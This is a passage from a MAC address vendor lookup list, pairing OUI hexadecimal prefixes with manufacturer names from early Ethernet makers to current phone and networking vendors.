SSANGYONG COMPUTER SYSTEMS 004082 LABORATORY EQUIPMENT CORP. 0040F1 CHUO ELECTRONICS CO., LTD. 0040A9 DATACOM INC. 0040E3 QUIN SYSTEMS LTD 004091 PROCOMP INDUSTRIA ELETRONICA 0040EA PLAIN TREE SYSTEMS INC 0040A7 ITAUTEC PHILCO S.A. 004064 KLA INSTRUMENTS CORPORATION 004043 Nokia Siemens Networks GmbH & Co. KG. 00405A GOLDSTAR INFORMATION & COMM. 004013 NTT DATA COMM. SYSTEMS CORP. 00400C GENERAL MICRO SYSTEMS, INC. 00405E NORTH HILLS ISRAEL 0040FA MICROBOARDS, INC. 004014 COMSOFT GMBH 004000 PCI COMPONENTES DA AMZONIA LTD 00406C COPERNIQUE 004075 Tattile SRL 004053 AMPRO COMPUTERS 008038 DATA RESEARCH & APPLICATIONS 00805E LSI LOGIC CORPORATION 008060 NETWORK INTERFACE CORPORATION 0080C3 BICC INFORMATION SYSTEMS & SVC 008044 SYSTECH COMPUTER CORP. 008006 COMPUADD CORPORATION 00809B JUSTSYSTEM CORPORATION 0080DF ADC CODENOLL TECHNOLOGY CORP. 008028 TRADPOST (HK) LTD 008061 LITTON SYSTEMS, INC. 0080F5 Quantel Ltd 0080B9 ARCHE TECHNOLIGIES INC. 004063 VIA TECHNOLOGIES, INC. 00808A SUMMIT MICROSYSTEMS CORP. 0080A7 Honeywell International Inc 008066 ARCOM CONTROL SYSTEMS, LTD. 0080CB FALCO DATA PRODUCTS 008007 DLOG NC-SYSTEME 008062 INTERFACECO. 00801E XINETRON, INC. 0080E2 T.D.I. CO., LTD. 008049 NISSIN ELECTRIC CO., LTD. 0080C1 LANEX CORPORATION 0080A3 Lantronix 0080BC HITACHI ENGINEERING CO., LTD 008036 REFLEX MANUFACTURING SYSTEMS 008083 AMDAHL 0080B8 DMG MORI B.U.G. CO., LTD. 00804D CYCLONE MICROSYSTEMS, INC. 0080D4 CHASE RESEARCH LTD. 00803D SURIGIKEN CO.,LTD. 00808B DACOLL LIMITED 0080B2 NETWORK EQUIPMENT TECHNOLOGIES 008076 MCNC 00800B CSK CORPORATION 008018 KOBE STEEL, LTD. 008068 YAMATECH SCIENTIFIC LTD. 0080A8 VITACOM CORPORATION 008033 EMS Aviation, Inc. 00807C FIBERCOM, INC. 008091 TOKYO ELECTRIC CO.,LTD 00008E SOLBOURNE COMPUTER, INC. 0000DC HAYES MICROCOMPUTER PRODUCTS 000063 BARCO CONTROL ROOMS GMBH 00004E AMPEX CORPORATION 0000BD Mitsubishi Cable Industries, Ltd. / Ryosei Systems 00002E SOCIETE EVIRA 00003F SYNTREX, INC. 00809D Commscraft Ltd. 0080F4 TELEMECANIQUE ELECTRIQUE 008022 SCAN-OPTICS 0000CD Allied Telesis Labs Ltd 0080DD GMX INC/GIMIX 0080FB BVM LIMITED 0080B4 SOPHIA SYSTEMS 00807F DY-4 INCORPORATED 00802D XYLOGICS INC 000061 GATEWAY COMMUNICATIONS 0000EA UPNOD AB 000043 MICRO TECHNOLOGY 000017 Oracle 0000B2 TELEVIDEO SYSTEMS, INC. 0000EE NETWORK DESIGNERS, LTD. 0000E5 SIGMEX LTD. 000089 CAYMAN SYSTEMS INC. 0000FF CAMTEC ELECTRONICS LTD. 0000B7 DOVE COMPUTER CORPORATION 0000F2 SPIDER COMMUNICATIONS 0000CC DENSAN CO., LTD. 0000A4 ACORN COMPUTERS LIMITED 0000DB British Telecommunications plc 0000C1 Madge Ltd. 0000F6 APPLIED MICROSYSTEMS CORP. 000077 INTERPHASE CORPORATION 0000A2 Bay Networks 0000EC MICROPROCESS 0000C2 INFORMATION PRESENTATION TECH. 0000FC MEIKO 00006D CRAY COMMUNICATIONS, LTD. 0000DA ATEX 0000DD TCL INCORPORATED 0000AE DASSAULT ELECTRONIQUE 0000A0 SANYO Electric Co., Ltd. 0000C0 WESTERN DIGITAL CORPORATION 000033 EGAN MACHINERY COMPANY 00009D LOCUS COMPUTING CORPORATION 0000FD HIGH LEVEL HARDWARE 000065 Network General Corporation 000011 NORMEREL SYSTEMES 000010 SYTEK INC. 0000BC Rockwell Automation 08007E AMALGAMATED WIRELESS(AUS) LTD 08007F CARNEGIE-MELLON UNIVERSITY 000099 MTX, INC. 0000C4 WATERS DIV. OF MILLIPORE 0000EB MATSUSHITA COMM. IND. CO. LTD. 000028 PRODIGY SYSTEMS CORPORATION 08003B TORUS SYSTEMS LIMITED 08003C SCHLUMBERGER WELL SERVICES 080034 FILENET CORPORATION 080036 INTERGRAPH CORPORATION 080033 BAUSCH & LOMB 080048 EUROTHERM GAUGING SYSTEMS 080043 PIXEL COMPUTER INC. 080045 CONCURRENT COMPUTER CORP. 080078 ACCELL CORPORATION 08006D WHITECHAPEL COMPUTER WORKS 080030 NETWORK RESEARCH CORPORATION 080031 LITTLE MACHINES INC. 08002E METAPHOR COMPUTER SYSTEMS 080056 STANFORD LINEAR ACCEL. CENTER 08004F CYGNET SYSTEMS 080050 DAISY SYSTEMS CORP. 08005E COUNTERPOINT COMPUTER INC. 080076 PC LAN TECHNOLOGIES 080075 DANSK DATA ELECTRONIK 08002B DIGITAL EQUIPMENT CORPORATION 080029 Megatek Corporation 0270B0 M/A-COM INC. COMPANIES 000053 COMPUCORP 080090 SONOMA SYSTEMS 08000A NESTAR SYSTEMS INCORPORATED 00800F STANDARD MICROSYSTEMS 00406B SYSGEN 08000F MITEL CORPORATION 080023 Panasonic Communications Co., Ltd. B04FC3 Shenzhen NVC Cloud Technology Co., Ltd. 08001C KDD-KOKUSAI DEBNSIN DENWA CO. 00DD0C UNGERMANN-BASS INC. 080018 PIRELLI FOCOM NETWORKS 0000A6 NETWORK GENERAL CORPORATION 00BBF0 UNGERMANN-BASS INC. 00408E Tattile SRL 000004 XEROX CORPORATION 00DD0E UNGERMANN-BASS INC. 88571D Seongji Industry Company 7CF31B LG Electronics (Mobile Communications) 0001C8 THOMAS CONRAD CORP. CCEF03 Hunan Keyshare Communication Technology Co., Ltd. 102FA3 Shenzhen Uvision-tech Technology Co.Ltd 7048F7 Nintendo Co.,Ltd 18E1CA wanze ECBEDD Sagemcom Broadband SAS 00C0B6 HVE, Inc. 309176 Skyworth Digital Technology(Shenzhen) Co.,Ltd 78C881 Sony Interactive Entertainment Inc. D44F68 Eidetic Communications Inc 749EA5 OHSUNG 8CC84B CHONGQING FUGUI ELECTRONICS CO.,LTD. 0C2FB0 Samsung Electronics Co.,Ltd B40216 Cisco Systems, Inc 54A493 IEEE Registration Authority 6C1C71 Zhejiang Dahua Technology Co., Ltd. CC6A10 The Chamberlain Group, Inc F03F95 HUAWEI TECHNOLOGIES CO.,LTD 185644 HUAWEI TECHNOLOGIES CO.,LTD 9C69D1 HUAWEI TECHNOLOGIES CO.,LTD 185A58 Dell Inc. C43A35 FN-LINK TECHNOLOGY LIMITED 04D16E IEEE Registration Authority 040E3C HP Inc. C4E0DE Zhengzhou XindaJiean Information Technology Co.,Ltd. 901A4F EM Microelectronic C84F0E Integrated Device Technology (Malaysia) Sdn. Bhd. 6CD2BA zte corporation 303ABA Guangzhou BaoLun Electronics Co., Ltd D88ADC Huawei Device Co., Ltd. 10E953 Huawei Device Co., Ltd. 7C48B2 Vida Resources Lte Ltd 2CAB33 Texas Instruments B887C6 Prudential Technology co.,LTD EC9C32 Sichuan AI-Link Technology Co., Ltd. 4CADA8 PANOPTICS CORP. FC1CA1 Nokia D42DC5 Panasonic i-PRO Sensing Solutions Co., Ltd. E8D03C Shenzhen Jingxun Software Telecommunication Technology Co.,Ltd 1C1ADF Microsoft Corporation D4F547 Google, Inc. 981BB5 ASSA ABLOY Korea Co., Ltd iRevo 34CB1A Procter & Gamble Company F0B107 Ericsson AB 784F9B Juniper Networks 783A6C TECNO MOBILE LIMITED E04007 Huawei Device Co., Ltd. 383FB3 Technicolor CH USA Inc. 70CE8C Samsung Electronics Co.,Ltd 4070F5 Apple, Inc. B035B5 Apple, Inc. 90AFD1 netKTI Co., Ltd 800C67 Apple, Inc. 90812A Apple, Inc. 7817BE HUAWEI TECHNOLOGIES CO.,LTD F072EA Google, Inc. B87BC5 Apple, Inc. F05136 TCT mobile ltd 105932 Roku, Inc 207454 vivo Mobile Communication Co., Ltd. B8C9B5 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 88ACC0 Zyxel Communications Corporation 90FD73 zte corporation 1C1E38 PCCW Global, Inc. 3C410E Cisco Systems, Inc 88D98F Juniper Networks 0045E2 CyberTAN Technology Inc. 006967 IEEE Registration Authority F86FDE Shenzhen Goodix Technology Co.,Ltd. 646624 Sagemcom Broadband SAS B0F530 Hitron Technologies. Inc 740AE1 Huawei Device Co., Ltd. B4A898 Huawei Device Co., Ltd. 0CE4A0 Huawei Device Co., Ltd. BC1AE4 Huawei Device Co., Ltd. 043F72 Mellanox Technologies, Inc. 1C4D66 Amazon Technologies Inc. 502CC6 GREE ELECTRIC APPLIANCES, INC. OF ZHUHAI F4FEFB Samsung Electronics Co.,Ltd 984914 Wistron Neweb Corporation 0CEE99 Amazon Technologies Inc. 00117E Midmark Corp D028BA Realme Chongqing MobileTelecommunications Corp Ltd A428B7 Yangtze Memory Technologies Co., Ltd. 9492D2 KCF Technologies, Inc. E4A8DF COMPAL INFORMATION (KUNSHAN) CO., LTD. 8C53C3 Beijing Xiaomi Mobile Software Co., Ltd 702F35 HUAWEI TECHNOLOGIES CO.,LTD C014B8 Nokia 00763D Veea 3093BC Sagemcom Broadband SAS FCF5C4 Espressif Inc. E826B6 Inside Biometrics International Limited 54CE69 Hikari Trading Co.,Ltd. 6CC63B Taicang T&W Electronics 588E81 Silicon Laboratories 48B02D NVIDIA Corporation 4CE176 Cisco Systems, Inc 6CAEF6 eero inc. FC8E6E StreamCCTV, LLC E02AE6 Fiberhome Telecommunication Technologies Co.,LTD 641236 Technicolor CH USA Inc. 788B2A Zhen Shi Information Technology (Shanghai) Co., Ltd. AC64CF FN-LINK TECHNOLOGY LIMITED F06728 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD BCD767 Private 9CE176 Cisco Systems, Inc 102959 Apple, Inc. E47684 Apple, Inc. B41A1D Samsung Electronics Co.,Ltd F05CD5 Apple, Inc. 3CDA6D Tiandy Technologies CO.,LTD F80DF0 zte corporation 9CE91C zte corporation 5C17CF OnePlus Technology (Shenzhen) Co., Ltd A4FA76 New H3C Technologies Co., Ltd 70EA5A Apple, Inc. 3CFAD3 IEEE Registration Authority 8C6078 Swissbit AG 00DD25 Shenzhen hechengdong Technology Co., Ltd 8020E1 BVBA DPTechnics 0445A1 NIRIT- XinweiTelecom Technology Co., Ltd. 8C97EA FREEBOX SAS 30AB6A SAMSUNG ELECTRO-MECHANICS(THAILAND) 749BE8 Hitron Technologies. Inc 5CBAEF CHONGQING FUGUI ELECTRONICS CO.,LTD. 4C6371 Xiaomi Communications Co Ltd D84DB9 Wu Qi Technologies,Inc. A04F85 LG Electronics (Mobile Communications) D807B6 TP-LINK TECHNOLOGIES CO.,LTD. 646E97 TP-LINK TECHNOLOGIES CO.,LTD. 78507C Juniper Networks 001258 TechVoIP Sp z o.o. 347839 zte corporation 6C1632 HUAWEI TECHNOLOGIES CO.,LTD F419E2 Volterra 4CA003 VITEC 2C1A01 HUAWEI TECHNOLOGIES CO.,LTD 24169D Cisco Systems, Inc 64F2FB Hangzhou Ezviz Software Co.,Ltd. 30809B New H3C Technologies Co., Ltd 7422BB Huawei Device Co., Ltd. 6C0D34 Nokia 4C4576 China Mobile(Hangzhou) Information Technology Co.,Ltd. B440A4 Apple, Inc. 48B8A3 Apple, Inc. BC428C ALPS ELECTRIC CO., LTD. F07CC7 Juniper Networks F4DBE3 Apple, Inc. D45EEC Beijing Xiaomi Electronics Co., Ltd. 74C929 Zhejiang Dahua Technology Co., Ltd. D4CFF9 Shenzhen SEI Robotics Co.,Ltd 5CB29E ASCO Power Technologies 9CC9EB NETGEAR 94CC04 IEEE Registration Authority 90EC77 silicom 88C397 Beijing Xiaomi Mobile Software Co., Ltd F0F6C1 Sonos, Inc. 540384 Hongkong Nano IC Technologies Co., Ltd 60684E Samsung Electronics Co.,Ltd 8020FD Samsung Electronics Co.,Ltd B4CE40 Samsung Electronics Co.,Ltd 305075 GN Audio A/S 04BDBF Samsung Electronics Co.,Ltd BC7ABF Samsung Electronics Co.,Ltd 2CC546 Huawei Device Co., Ltd. 0C839A Huawei Device Co., Ltd. E0E0FC Huawei Device Co., Ltd. 94E7EA HUAWEI TECHNOLOGIES CO.,LTD 94E4BA Huawei Device Co., Ltd. 347146 Huawei Device Co., Ltd. F4B78D HUAWEI TECHNOLOGIES CO.,LTD A416E7 HUAWEI TECHNOLOGIES CO.,LTD B40931 HUAWEI TECHNOLOGIES CO.,LTD 30B9B0 Intracom Asia Co., Ltd D4DACD BSkyB Ltd 0C35FE Fiberhome Telecommunication Technologies Co.,LTD 8C83DF Nokia AC4B1E Integri-Sys.Com LLC 4CB911 Raisecom Technology CO.,LTD B0E4D5 Google, Inc. 6869CA Hitachi, Ltd. AC4A56 Cisco Systems, Inc F4EAB5 Extreme Networks, Inc. 001977 Extreme Networks, Inc. 08EA44 Extreme Networks, Inc. B0B5C3 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 704A0E AMPAK Technology,Inc. 08306B Palo Alto Networks 00869C Palo Alto Networks 40476A Astro Gaming 4CCE2D Danlaw Inc B87CF2 Extreme Networks, Inc. BC0F9A D-Link International 30B237 GD Midea Air-Conditioning Equipment Co.,Ltd. 2462CE Aruba, a Hewlett Packard Enterprise Company BC5A56 Cisco Systems, Inc C09BF4 IEEE Registration Authority 7CEF61 STR Elektronik Josef Schlechtinger GmbH 400589 T-Mobile, USA 70039F Espressif Inc. 64A965 Linkflow Co., Ltd. 68E209 HUAWEI TECHNOLOGIES CO.,LTD 045FB9 Cisco Systems, Inc 882B94 MADOKA SYSTEM Co.,Ltd. F4308B Xiaomi Communications Co Ltd DC6B12 worldcns inc. 7458F3 Amazon Technologies Inc. A0DE0F Huawei Device Co., Ltd. F487C5 Huawei Device Co., Ltd. 98DF82 Hangzhou Hikvision Digital Technology Co.,Ltd. 3CF652 zte corporation 080088 Brocade Communications Systems LLC 00010F Brocade Communications Systems LLC 08B055 ASKEY COMPUTER CORP CC4E24 Brocade Communications Systems LLC 00E052 Brocade Communications Systems LLC 08AA55 Motorola Mobility LLC, a Lenovo Company 5C0FFB Amino Communications Ltd 54219D Samsung Electronics Co.,Ltd C88BE8 Masimo Corporation 404028 ZIV 000631 Calix Inc. A80577 Netlist, Inc. F041C6 Heat Tech Company, Ltd. E43A65 MofiNetwork Inc D8714D Texas Instruments 0CEC80 Texas Instruments 0015D2 Xantech Corporation 001F40 Speakercraft Inc. F86C03 Shenzhen Teleone Technology Co., Ltd CC9ECA HMD Global Oy 3C306F HUAWEI TECHNOLOGIES CO.,LTD 80E1BF HUAWEI TECHNOLOGIES CO.,LTD 482CD0 HUAWEI TECHNOLOGIES CO.,LTD DC7385 Huawei Device Co., Ltd. 5455D5 Huawei Device Co., Ltd. 184593 Taicang T&W Electronics 105DDC Huawei Device Co., Ltd. 34EAE7 Shanghai High-Flying ElectronicsTechnology Co., Ltd D4ABCD Hui Zhou Gaoshengda Technology Co.,LTD A0CAA5 INTELLIGENCE TECHNOLOGY OF CEC CO., LTD 58FDB1 LG Electronics E8854B Apple, Inc. E02B96 Apple, Inc. 28EC95 Apple, Inc. 001932 Gude Systems GmbH D0ABD5 Intel Corporate 681729 Intel Corporate B808CF Intel Corporate DC7196 Intel Corporate 50E085 Intel Corporate 1C1BB5 Intel Corporate 983B8F Intel Corporate D0C637 Intel Corporate 04EA56 Intel Corporate D43B04 Intel Corporate 5C5F67 Intel Corporate 0C5415 Intel Corporate 302432 Intel Corporate DC8B28 Intel Corporate D83BBF Intel Corporate 14F6D8 Intel Corporate E0D4E8 Intel Corporate F83441 Intel Corporate E470B8 Intel Corporate 94E6F7 Intel Corporate 4C1D96 Intel Corporate E00EE4 DWnet Technologies(Suzhou) Corporation A8469D Cisco Meraki 6CDEA9 Cisco Meraki 703AA6 New H3C Technologies Co., Ltd 8CCEFD Shenzhen zhouhai technology co.,LTD 50FB19 CHIPSEA TECHNOLOGIES (SHENZHEN) CORP. 9408C7 Huawei Device Co., Ltd. 046C59 Intel Corporate 386893 Intel Corporate 903FEA HUAWEI TECHNOLOGIES CO.,LTD 20AB48 HUAWEI TECHNOLOGIES CO.,LTD CCD73C HUAWEI TECHNOLOGIES CO.,LTD C8CA63 Huawei Device Co., Ltd. 9437F7 Huawei Device Co., Ltd. 94E70B Intel Corporate 001EE0 Urmet SpA 98B8BC Samsung Electronics Co.,Ltd 184E16 Samsung Electronics Co.,Ltd C03D03 Samsung Electronics Co.,Ltd A497B1 CHONGQING FUGUI ELECTRONICS CO.,LTD. BCA993 Cambium Networks Limited D440D0 OCOSMOS Co., LTD 10746F MOTOROLA SOLUTIONS MALAYSIA SDN. BHD. DCD9AE Nokia Shanghai Bell Co., Ltd. 1C08C1 LG Innotek 44E6B0 China Mobile IOT Company Limited 747A90 Murata Manufacturing Co., Ltd. 24E9CA Huawei Device Co., Ltd. 14007D zte corporation 94AEF0 Cisco Systems, Inc 00927D Ficosa Internationa(Taicang) C0.,Ltd. 441622 Microsoft Corporation FC73FB HUAWEI TECHNOLOGIES CO.,LTD 34873D Quectel Wireless Solutions Co., Ltd. 9CF61A Carrier Fire & Security 044562 ANDRA Sp. z o. o. 58B623 Beijing Xiaomi Mobile Software Co., Ltd A022DE vivo Mobile Communication Co., Ltd. 74F7F6 Shanghai Sunmi Technology Co.,Ltd. 00269E Quanta Computer Inc. C45444 Quanta Computer Inc. 00C09F Quanta Computer Inc. 001B24 Quanta Computer Inc. C80AA9 Quanta Computer Inc. 60EB69 Quanta Computer Inc. C0CC42 Sichuan Tianyi Comheart Telecom Co., Ltd. C08F20 Shenzhen SkyworthDigitalTechnologyCO., Ltd 241AE6 Huawei Device Co., Ltd. 60B76E Google, Inc. 1C5D80 Mitubishi Hitachi Power Systems Industries Co., Ltd. B42330 Itron Inc 084EBF Sumitomo Electric Industries, Ltd 3C9C0F Intel Corporate 08FBEA AMPAK Technology,Inc. A802DB zte corporation 801605 Vodafone Italia S.p.A. 5865E6 infomark 5C443E Skullcandy F88200 CaptionCall 60EB5A Asterfusion Data Technologies Co.,Ltd 340F66 Web Sensing LLC 0050F1 Maxlinear, Inc F4E578 LLC Proizvodstvennaya Kompania TransService 9012A1 We Corporation Inc. 64B623 CCS Care Communication Solutions GmbH B88035 Shenzhen Qihu Intelligent Technology Company Limited 0854BB SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD E4D373 HUAWEI TECHNOLOGIES CO.,LTD C0BC9A HUAWEI TECHNOLOGIES CO.,LTD 702C09 Nintendo Co.,Ltd 6852D6 UGame Technology Co.,Ltd FC1999 Xiaomi Communications Co Ltd B4C26A Garmin International E89F80 Belkin International Inc. E81B69 Sercomm Corporation. 001711 Cytiva Sweden AB BC5C4C ELECOM CO.,LTD. 04AB18 ELECOM CO.,LTD. A45129 XAG 6CE5F7 New H3C Technologies Co., Ltd B8DD71 zte corporation 78F8B8 Rako Controls Ltd 001612 Otsuka Electronics Co., Ltd. 5C0272 Silicon Laboratories FC4AE9 Castlenet Technology Inc. 0446CF Beijing Venustech Cybervision Co.,Ltd. CC874A Nokia 00078E Garz & Fricke GmbH B436D1 Renesas Electronics (Penang) Sdn. Bhd. 006151 HUAWEI TECHNOLOGIES CO.,LTD DC774C Cisco Systems, Inc 204441 Remote Solution BC76C5 HUAWEI TECHNOLOGIES CO.,LTD FC4482 Intel Corporate D8F883 Intel Corporate A085FC Microsoft Corporation C49886 Qorvo International Pte. Ltd. B85F98 Amazon Technologies Inc. 80F1F1 Tech4home, Lda 245A4C Ubiquiti Networks Inc. 14A9D0 F5 Networks, Inc. 9CFFC2 AVI Systems GmbH 44D878 Hui Zhou Gaoshengda Technology Co.,LTD A0D807 Huawei Device Co., Ltd. 2C780E Huawei Device Co., Ltd. 34B20A Huawei Device Co., Ltd. 98F4AB Espressif Inc. D8BFC0 Espressif Inc. 202681 TECNO MOBILE LIMITED F4D620 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 64FB92 PPC Broadband Inc. 141346 Skyworth Digital Technology(Shenzhen) Co.,Ltd 949034 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD 987A10 Ericsson AB 542BDE New H3C Technologies Co., Ltd 98F781 ARRIS Group, Inc. 7897C3 DINGXIN INFORMATION TECHNOLOGY CO.,LTD 4C90DB JL Audio B899AE Shenzhen MiaoMingIntelligent Technology Co.,Ltd E8D0B9 Taicang T&W Electronics 3C8F06 Shenzhen Libtor Technology Co.,Ltd B00875 HUAWEI TECHNOLOGIES CO.,LTD 8CF112 Motorola Mobility LLC, a Lenovo Company 847637 HUAWEI TECHNOLOGIES CO.,LTD FC9435 HUAWEI TECHNOLOGIES CO.,LTD E02481 HUAWEI TECHNOLOGIES CO.,LTD A8C0EA Pepwave Limited 182AD3 Juniper Networks 80B07B zte corporation C85A9F zte corporation 44AEAB GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD A4F05E GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 1C687E Shenzhen Qihu Intelligent Technology Company Limited C03656 Fiberhome Telecommunication Technologies Co.,LTD 5885A2 Realme Chongqing MobileTelecommunications Corp Ltd 2CF89B Cisco Systems, Inc 00071C AT&T E0E8E6 Shenzhen C-Data Technology Co., Ltd. 500291 Espressif Inc. 001DDF Sunitec Enterprise Co.,Ltd 8C0FFA Hutec co.,ltd ACFE05 ITEL MOBILE LIMITED 782A79 Integrated Device Technology (Malaysia) Sdn. Bhd. 786559 Sagemcom Broadband SAS 50D2F5 Beijing Xiaomi Mobile Software Co., Ltd 24526A Zhejiang Dahua Technology Co., Ltd. 20DFB9 Google, Inc. 5CCAD3 CHIPSEA TECHNOLOGIES (SHENZHEN) CORP. 28167F Xiaomi Communications Co Ltd B03E51 BSkyB Ltd 5CE883 HUAWEI TECHNOLOGIES CO.,LTD 100177 HUAWEI TECHNOLOGIES CO.,LTD 44A191 HUAWEI TECHNOLOGIES CO.,LTD 6023A4 Sichuan AI-Link Technology Co., Ltd. A4530E Cisco Systems, Inc 00403A IMPACT TECHNOLOGIES F887F1 Apple, Inc. 9C28BF Continental Automotive Czech Republic s.r.o. 807215 BSkyB Ltd 74D637 Amazon Technologies Inc. D05F64 IEEE Registration Authority BCC31B Kygo Life A 64DF10 JingLue Semiconductor(SH) Ltd. C463FB Neatframe AS 0C8126 Juniper Networks 305714 Apple, Inc. 60447A Water-i.d. GmbH C8B1CD Apple, Inc. 1460CB Apple, Inc. B8F12A Apple, Inc. 04AB6A Chun-il Co.,Ltd. 544E45 Private 04C807 Xiaomi Communications Co Ltd 04A222 Arcadyan Corporation 489BD5 Extreme Networks, Inc. 3C8C93 Juniper Networks 28FE65 DongGuan Siyoto Electronics Co., Ltd 1806F5 RAD Data Communications, Ltd. 7484E1 Dongguan Haoyuan Electronics Co.,Ltd 44FB5A zte corporation 4459E3 HUAWEI TECHNOLOGIES CO.,LTD DC54D7 Amazon Technologies Inc. 44D3CA Cisco Systems, Inc 889FAA Hella Gutmann Solutions GmbH E454E8 Dell Inc. 20968A China Mobile (Hangzhou) Information Technology Co., Ltd. 8C1850 China Mobile (Hangzhou) Information Technology Co., Ltd. D8D4E6 Hytec Inter Co., Ltd. 683F1E EFFECT Photonics B.V. 0035FF Texas Instruments F8E7A0 vivo Mobile Communication Co., Ltd. 2CFFEE vivo Mobile Communication Co., Ltd. 840B7C Hitron Technologies. Inc 48A73C Sichuan tianyi kanghe communications co., LTD C85D38 HUMAX Co., Ltd. F8A763 Zhejiang Tmall Technology Co., Ltd. A49813 ARRIS Group, Inc. 6C2990 WiZ Connected Lighting Company Limited 9835ED HUAWEI TECHNOLOGIES CO.,LTD 084F0A HUAWEI TECHNOLOGIES CO.,LTD A8494D HUAWEI TECHNOLOGIES CO.,LTD 44004D HUAWEI TECHNOLOGIES CO.,LTD 18CF24 HUAWEI TECHNOLOGIES CO.,LTD D89B3B HUAWEI TECHNOLOGIES CO.,LTD 88403B HUAWEI TECHNOLOGIES CO.,LTD FC8743 HUAWEI TECHNOLOGIES CO.,LTD 807693 Newag SA BC9740 IEEE Registration Authority 04885F HUAWEI TECHNOLOGIES CO.,LTD C850CE HUAWEI TECHNOLOGIES CO.,LTD 50F8A5 eWBM Co., Ltd. 1449BC DrayTek Corp. 20F478 Xiaomi Communications Co Ltd 90735A Motorola Mobility LLC, a Lenovo Company 1C8259 IEEE Registration Authority 0004DF TERACOM TELEMATICA S.A 7438B7 CANON INC. 8C04BA Dell Inc. 00FA21 Samsung Electronics Co.,Ltd 7C2302 Samsung Electronics Co.,Ltd 18B6F7 NEW POS TECHNOLOGY LIMITED 5CB15F Oceanblue Cloud Technology Limited 18AACA Sichuan tianyi kanghe communications co., LTD D49DC0 Samsung Electronics Co.,Ltd D0196A Ciena Corporation 4413D0 zte corporation 2462AB Espressif Inc. 88B436 Private 6CAB05 Cisco Systems, Inc 000BE4 Hosiden Corporation 60D248 ARRIS Group, Inc. 485DEB Just Add Power 501395 Sichuan AI-Link Technology Co., Ltd. 18D9EF Shuttle Inc. 88DA33 Beijing Xiaoyuer Network Technology Co., Ltd 84C78F STORDIS GmbH 5041B9 I-O DATA DEVICE,INC. 80DABC Megafone Limited C09FE1 zte corporation 184644 Home Control Singapore Pte Ltd B0700D Nokia 346B5B New H3C Technologies Co., Ltd 84E892 Actiontec Electronics, Inc 78E2BD Vodafone Automotive S.p.A. F848FD China Mobile Group Device Co.,Ltd. 20DA22 HUAWEI TECHNOLOGIES CO.,LTD C821DA Shenzhen YOUHUA Technology Co., Ltd E0B655 Beijing Xiaomi Electronics Co., Ltd. 002175 Pacific Satellite International Ltd. 889746 Sichuan AI-Link Technology Co., Ltd. 1CDE57 Fiberhome Telecommunication Technologies Co.,LTD E0DCFF Xiaomi Communications Co Ltd 608CDF Private 00778D Cisco Systems, Inc 000E8C Siemens AG 008764 Cisco Systems, Inc FC3342 Juniper Networks C468D0 VTech Telecommunications Ltd. 14AEDB VTech Telecommunications Ltd. 78DB2F Texas Instruments 8C0FA0 di-soric GmbH & Co. KG DCB808 Extreme Networks, Inc. B0E71D Shanghai Maigantech Co.,Ltd F8BBBF eero inc. 846FCE GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 20658E HUAWEI TECHNOLOGIES CO.,LTD 183D5E HUAWEI TECHNOLOGIES CO.,LTD DC7137 zte corporation 847C9B GD Midea Air-Conditioning Equipment Co.,Ltd. 3441A8 ER-Telecom 34DB9C Sagemcom Broadband SAS 7440BE LG Innotek 04D4C4 ASUSTek COMPUTER INC. F0D4E2 Dell Inc. A8E2C3 Shenzhen YOUHUA Technology Co., Ltd 9020C2 Aruba, a Hewlett Packard Enterprise Company 0CA06C Industrial Cyber Sensing Inc. FCD2B6 IEEE Registration Authority 804A14 Apple, Inc. 703C69 Apple, Inc. AC2DA9 TECNO MOBILE LIMITED FCB662 IC Holdings LLC 48049F ELECOM CO., LTD 087F98 vivo Mobile Communication Co., Ltd. C85261 ARRIS Group, Inc. C04121 Nokia 7488BB Cisco Systems, Inc A4CF12 Espressif Inc. 4C6AF6 HMD Global Oy 489DD1 Samsung Electronics Co.,Ltd B06FE0 Samsung Electronics Co.,Ltd 44B994 Douglas Lighting Controls 40A93F Pivotal Commware, Inc. 70BF92 GN Audio A/S C08C71 Motorola Mobility LLC, a Lenovo Company F46F4E Echowell 2C3F0B Cisco Meraki 5C8816 Rockwell Automation 002F5C Cisco Systems, Inc F4645D Toshiba 38F85E HUMAX Co., Ltd. ACBB61 YSTen Technology Co.,Ltd 2479F8 KUPSON spol. s r.o. 7CFD82 GUANGDONG GENIUS TECHNOLOGY CO., LTD. 180D2C Intelbras 042DB4 First Property (Beijing) Co., Ltd Modern MOMA Branch 04E0B0 Shenzhen YOUHUA Technology Co., Ltd 08ECF5 Cisco Systems, Inc D07650 IEEE Registration Authority 60D0A9 Samsung Electronics Co.,Ltd 88CEFA HUAWEI TECHNOLOGIES CO.,LTD 002706 YOISYS 00CB51 Sagemcom Broadband SAS C464B7 Fiberhome Telecommunication Technologies Co.,LTD EC4118 XIAOMI Electronics,CO.,LTD D8860B IEEE Registration Authority 342003 Shenzhen Feitengyun Technology Co.,LTD F07D68 D-Link Corporation 40E3D6 Aruba, a Hewlett Packard Enterprise Company B45D50 Aruba, a Hewlett Packard Enterprise Company 78DAA2 Cynosure Technologies Co.,Ltd 38B19E IEEE Registration Authority 38E26E ShenZhen Sweet Rain Electronics Co.,Ltd. 00D050 Iskratel d.o.o. 70C9C6 Cisco Systems, Inc D4B92F Technicolor CH USA Inc. 689A87 Amazon Technologies Inc. 64AE88 Polytec GmbH ACA31E Aruba, a Hewlett Packard Enterprise Company 00177B Azalea Networks inc 98DAC4 TP-LINK TECHNOLOGIES CO.,LTD. 502B98 Es-tech International C82832 Beijing Xiaomi Electronics Co., Ltd. 946A77 Technicolor CH USA Inc. C4346B Hewlett Packard 8084A9 oshkosh Corporation F46E95 Extreme Networks, Inc. 4CC7D6 FLEXTRONICS MANUFACTURING(ZHUHAI)CO.,LTD. C80873 Ruckus Wireless 701BFB Integrated Device Technology (Malaysia) Sdn. Bhd. 04766E ALPS ELECTRIC CO., LTD. AC7A4D ALPS ELECTRIC CO., LTD. 001BB5 Cherry GmbH 002643 ALPS ELECTRIC CO., LTD. 38C096 ALPS ELECTRIC CO., LTD. D05157 LEAX Arkivator Telecom 288088 NETGEAR 64CE6E 